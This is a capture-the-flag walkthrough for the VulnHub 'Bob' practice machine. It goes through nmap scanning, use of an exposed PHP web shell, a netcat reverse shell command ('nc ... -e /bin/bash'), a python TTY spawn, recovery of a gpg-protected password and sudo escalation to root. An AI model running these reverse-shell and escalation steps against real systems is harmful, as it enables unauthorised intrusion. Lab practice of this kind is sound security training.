BOB Vulnhub — OSCP_DAY-1
Bob is an easy-level boot2root machine on VulnHub. It’s one of the OSCP similar machines. I will add the link for the machine here. you can download it.
Download the machine and configure it on ORACLE VIRTUAL BOX. VM-Ware having some Network stability issues there.
Let’s begin……
First of all, let’s do Nmap subnet scanning to scan my subnet and find the IP of the target machine.
nmap -sn
Nmap subnet scanning
Here we found the domain name and IP of the target server.
after finding the IP, let us do the port scanning to find open ports, services, operating system, etc. we can start with TCP scanning.
nmap -sT -sV -oS nmap/tcp.out
oper ports
here I got two open ports. 21- FTP and 80 HTTP. also, I will do Nmap default script scanning here on given ports.
nmap -sC -sV -p 21,80 -oS nmap/default.txt
default script scanning
after doing this we found some files inside the web port. here I am not going for gobuster and further tools. now let’s visit the files via a web browser.
the file dev_shell.php looks suspicious. but while visiting other files I don’t get any sensitive content. so let’s go for dev_shell.php
this PHP page looks like a web shell. let’s check for remote code execution. while putting “id” there, it gives us user-id group id and further details. so using this dev_shell, we can execute commands remotely. I will add an extra reference about arbitrary code execution below. you can refer to this for further knowledge
Arbitrary code execution - Google Search
_Please click here if you are not redirected within a few seconds. In computer security, arbitrary code execution is an…
But while executing some commands they show some errors.
so let’s try some bypassing methodologies.
first, we have to set up a listener on my pc to handle incoming connections. using Netcat I am going to set up the listener.
nc -nvlp 1234
after that, I am going to execute this code in the dev_shell of the target server to get a reverse shell.
id & nc 1234 -e /bin/bash
after executing this code we got the reverse shell access in the Netcat listener.
initial foothold
in this target server, python3 is installed. so using python3 we can do shell spawning. The below page refers to shell spawning. you can refer to this page for further knowledge
Spawning a TTY Shell
_Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here…
python3 – version
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
Now it’s time for privilege escalation. This machine’s privilege escalation is a kind of treasure hunting, the password is stored somewhere under the server.
after visiting bob’s home folder I found a file called old_passwordfile.html which contains jc and seb user passwords. But nothing is interesting there. after few minutes of enumeration inside /home/bob/Documents/ , there are some sensitive contents and notes. also there is a file called login.txt.gpg which is protected.
the staff.txt file contains some descriptions about other user-created by bob. now let’s visit the Secret directory. inside subfolders, we found a script called which contains the given content
take the first letter of all line as a password to open the encrypted data
using the below command we can decrypt this encrypted file
gpg — batch — passphrase HARPOCRATES -d login.txt.gpg
Now we got the bob user’s password. Hopefully, Bob is the admin, so getting root access via bob’s account will be pretty easy
now switch the user to bob using the above password, and execute sudo -l to check sudo rights
sudo -l
and found that bob can execute everything as root. so using sudo su we will take root access
sudo su
Now privilege escalation is completed. we got entire server access.